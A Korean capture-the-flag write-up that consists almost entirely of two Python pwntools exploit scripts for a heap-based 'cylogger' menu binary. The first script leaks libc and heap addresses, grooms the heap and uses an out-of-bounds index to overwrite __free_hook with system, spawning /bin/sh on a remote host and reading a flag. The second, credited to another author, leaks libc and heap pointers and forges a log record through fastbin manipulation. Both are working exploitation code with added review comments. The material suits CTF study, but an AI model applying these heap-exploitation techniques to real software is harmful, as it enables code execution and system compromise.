WHL_Cykor - Cylogger 본문
서브 취약점(OOB, Out-of-Bounds)을 브루트포스로 풀었지만 실수로 쉘을 날려 버린 슬픈 스토리가 있는 익스코드이다.
from pwn import *

#s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'})
# NOTE(review): the paste lost all indentation.  The nesting below (helper
# functions and the whole run inside one try/except/finally, loop bodies of a
# single line) is reconstructed and should be checked against the original.
#
# Every iteration opens a fresh connection, runs the complete chain and closes
# the socket in `finally`.  Because `except Exception` swallows everything, a
# failing attempt silently reconnects and starts over from the beginning.
# Python 2 script: `print` is a statement and strings are byte strings.
while True:
    try:
        s = remote('10.10.200.203', 10002)

        # --- menu drivers -------------------------------------------------
        # Each helper waits for the target's prompt and sends one single-letter
        # command followed by its arguments.

        def Leave(select, size, data):
            # 'L': create a log.  `select` answers the second prompt; only
            # select == 1 is followed by a size prompt and the content here --
            # for any other value nothing more is sent by this helper.
            s.recvuntil('>> ')
            s.sendline('L')
            s.recvuntil('>> ')
            s.sendline(str(select))
            if(select == 1):
                s.recvuntil('Size of Log >>')
                s.sendline(str(size))
                s.sendline(data)

        def See(index):
            # 'S': print the log stored at `index`.
            s.recvuntil('>> ')
            s.sendline('S')
            s.recvuntil('Index >> ')
            s.sendline(str(index))

        def Remove(index):
            # 'R': delete the log stored at `index`.
            s.recvuntil('>> ')
            s.sendline('R')
            s.recvuntil('Index >> ')
            s.sendline(str(index))

        def reseT():
            # 'T': reset the logs.
            s.recvuntil('>> ')
            s.sendline('T')

        def Change(index, data):
            # 'C': overwrite the log at `index` with `data`.  The data is sent
            # straight after the index without waiting for a further prompt.
            s.recvuntil('>> ')
            s.sendline('C')
            s.recvuntil('Index >> ')
            s.sendline(str(index))
            s.sendline(data)

        def All():
            # 'A': list every log.  Defined but not used in this run.
            s.recvuntil('>> ')
            s.sendline('A')

        # Banner up to the name prompt is echoed locally, then the name is sent.
        print s.recvuntil('Ur Name? >>')
        s.sendline('cdor1')

        # --- libc leak ----------------------------------------------------
        # Three logs, two removed, one re-created; 'S'ee on index 1 then
        # echoes 'bbbbbbbb' followed by bytes the script reads back as a
        # pointer.  The low byte is not echoed and is assumed to be 0x68.
        Leave(1, 1024, 'aaaa')
        Leave(1, 1024, 'bbbb')
        Leave(1, 1024, 'cccc')
        Remove(0)
        Remove(1)
        Leave(1, 1024, 'bbbbbbbb')
        See(1)
        s.recvuntil('bbbbbbbb\n')
        leak = u64(('\x68' + s.recv(5)).ljust(8, '\x00'))
        # NOTE(review): these offsets are hard-coded for one specific libc
        # build (presumably the ./libc.so.6 named in the commented-out local
        # line above) and are wrong for any other build.
        base = leak - 0x3c2068
        system = base + 0x456a0
        free_hook = base + 0x3c3788
        log.info('leak : ' + hex(leak))
        log.info('base : ' + hex(base))
        log.info('system : ' + hex(system))
        log.info('free_hook : ' + hex(free_hook))

        # --- heap leak ----------------------------------------------------
        # Same read-back on the same log after filling it with 16 'b's; this
        # time the assumed low byte is 0x00.
        Change(1, 'b'*16)
        See(1)
        s.recvuntil('Log : bbbbbbbbbbbbbbbb\n')
        heap_leak = u64(('\x00' + s.recv(5)).ljust(8, '\x00'))
        log.info('heap_leak : ' + hex(heap_leak))

        # --- heap grooming ------------------------------------------------
        # The payload is assembled from heap_leak- and free_hook-derived
        # addresses; the 0x28 / 0x64 constants and the repeat counts describe
        # the target's allocator state when this was written and are not
        # derivable from the script itself.
        Remove(1)
        Remove(2)
        payload = p64(heap_leak + 0x28)
        payload += p64(0)*2
        payload += p64(heap_leak + 0x28 + 8)
        payload += p64(1)
        payload += p64(free_hook)
        payload += p64(0x64)
        payload += p64(heap_leak + 0x28 + 8) * 120
        Leave(1, 1024, payload)
        for i in range(0, 100):
            Leave(1, 1024, p64(heap_leak + 0x28 + 8) * 127)
        reseT()
        # Repeated from above, presumably so the values are visible again
        # after the noisy loop.
        log.info('leak : ' + hex(leak))
        log.info('base : ' + hex(base))
        log.info('system : ' + hex(system))
        log.info('free_hook : ' + hex(free_hook))
        log.info('heap_leak : ' + hex(heap_leak))
        #raw_input()
        # Index far outside any real log slot: this is the out-of-bounds
        # access the write-up header says was found by brute force.
        Change(606858, p64(system))
        Leave(1, 100, '/bin/sh\x00')
        Remove(0)
        s.sendline("ls")
        # BUG: `p` is never defined (the connection object is `s`).  The
        # NameError raised here is swallowed by the `except` below and the
        # socket is closed in `finally`, so whatever session was reached at
        # this point is discarded and the loop reconnects -- the "accident"
        # the write-up header refers to.
        print p.recv()
        s.sendline("./flag_x")
        print p.recv()
        s.interactive()
    except Exception as e:
        # Swallows every error (including the NameError above); `e` is unused.
        pass
    finally:
        # If the very first remote() call fails, `s` is still unbound here and
        # the NameError escapes the loop; on later iterations it closes the
        # previous connection again.
        s.close()
원래 취약점의 익스코드 (by Demon-이진우)
from pwn import *

# Local run against the bundled libc; the remote target below is the
# alternative and is left commented out.
s = process('./cylogger', env=dict(LD_PRELOAD='./libc.so.6'))
#s = remote('10.10.200.203', 10002)

# login: answer the first '>>' prompt with the user name.
name = 'qwer'
s.recvuntil('>>')
s.sendline(name)
def go(n):
    """Pick main-menu entry *n* (1-based, as printed by the target).

    Slot 0 of the key table is a filler so the index matches the menu
    numbering; the letters are the single-character commands the prompt
    accepts.  Waits for the end of the last menu line (presumably
    "[E]xit") and then for the prompt before sending the key.
    """
    menu_keys = (0, 'L', 'S', 'R', 'T', 'C', 'A', 'E')
    s.recvuntil('xit')
    s.recvuntil('>>')
    s.sendline(menu_keys[n])
def make(t, m, sz=None):
    """Leave a log of type *t* whose content is *m*.

    Type 2 logs take no size; every other type is asked for one first,
    answered with *sz*.  The content is written with ``send`` (no newline)
    in both cases.
    """
    go(1)
    s.recvuntil('>>')
    s.sendline(str(t))
    if t != 2:
        # Only non-type-2 logs prompt for a size before the content.
        s.recvuntil('ize of Log >>')
        s.sendline(str(sz))
    s.send(m)
def rm(t):
    """Remove the log at index *t* ('R' menu entry)."""
    go(3)
    index_text = str(t)
    s.recvuntil('Index >>')
    s.sendline(index_text)
def se(t, tt):
    """Change the log at index *t* ('C' menu entry), replacing it with *tt*.

    The new content goes out with ``send``; no newline is appended.
    """
    go(5)
    index_text = str(t)
    s.recvuntil('Index >>')
    s.sendline(index_text)
    s.send(tt)
# NOTE(review): the paste lost all indentation; each `for` below is
# reconstructed with a single-line body and should be checked against the
# original script.  Python 2 (`print` statement, `raw_input`).

# --- libc leak --------------------------------------------------------------
# Three type-1 logs, remove the last, create it again; the 'A'll listing then
# prints whatever follows the single 'a' in entry [2], which is read back as
# a pointer with an assumed low byte of 0x00.
for i in range(3):
    make(1,'a',256)
rm(2)
make(1,'a',256)
go(6)
s.recvuntil('[2')
s.recvuntil('Log : a')
# NOTE(review): 2816 is a fixed offset into the libc build this was written
# against (the ./libc.so.6 loaded via LD_PRELOAD above); not portable.
lbc = u64('\x00'+s.recvline().replace('\n','').ljust(7,'\x00'))-2816
rm(3);rm(2);rm(1);rm(0)

# --- heap leak --------------------------------------------------------------
# One type-2 log; entry [0] of the listing is read back the same way.
make(2,'A')
go(6)
s.recvuntil('[0] Log : A')
hp = u64('\x00'+s.recvline().replace('\n','').ljust(7,'\x00'))
rm(0)

for i in range(2):
    make(1,'A'*240+'\x00'*8+'\x30'+'\x00'*7,256)
rm(1);rm(0)

# Pause so the process state can be inspected before the leaks are printed.
raw_input()
print '0x%x'%lbc
print '0x%x'%hp

# Target's menu, kept as a reference for the go() indices; this string
# literal is a no-op at runtime.
'''1. [L]eave log
2. [S]ee my log
3. [R]emove my log
4. rese[T] my log
5. [C]hange my log
6. [A]ll log'''

# --- layout setup -----------------------------------------------------------
# The numbered raw_input() calls are step-by-step pause points, presumably for
# attaching a debugger between allocator operations.  The constants 0x380,
# 2800 and 2947503 are tied to the heap layout and libc build this was
# developed against and are not derivable from the script itself.
# go(4)
make(2,'qwer')
make(2,'asdaf')
make(2,'zxcv')
make(2,'1234')
#make(2,'5678')
rm(0)
raw_input('1')
go(4)
raw_input('2')
make(2,'1'*20)
make(2,(p64(0x30)*3)[:-1])
raw_input('3')
#make(3,'3'*20)
make(1,'A'*40,80)
rm(3)
rm(1)
rm(0)
make(1,p64(hp+0x380)+'FASTBINCONTROL',40)
raw_input('4')
rm(1)
raw_input('5')
make(2,'tmp')
raw_input('6')
#make(2,'BOOMB')
make(2,'A'*8+p32(1)+p32(0)+p64(lbc+2800)+p32(8)) #make fake: presumably a forged log record built from the libc leak
se(0,p64(lbc-2947503))
s.interactive()